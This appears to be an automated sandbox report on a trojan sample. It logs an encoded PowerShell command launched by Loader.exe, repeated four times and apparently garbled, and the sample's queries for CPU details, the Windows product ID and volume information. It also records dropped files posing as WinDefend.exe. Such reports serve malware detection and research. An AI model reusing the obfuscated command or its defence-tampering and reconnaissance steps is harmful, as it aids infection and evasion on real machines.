Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma

Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Roaming\Loaader.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the product ID of Windows

Source: C:\Users\user\AppData\Roaming\Loaader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Infected.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loaader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Users\user\AppData\Roaming\Loaader.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
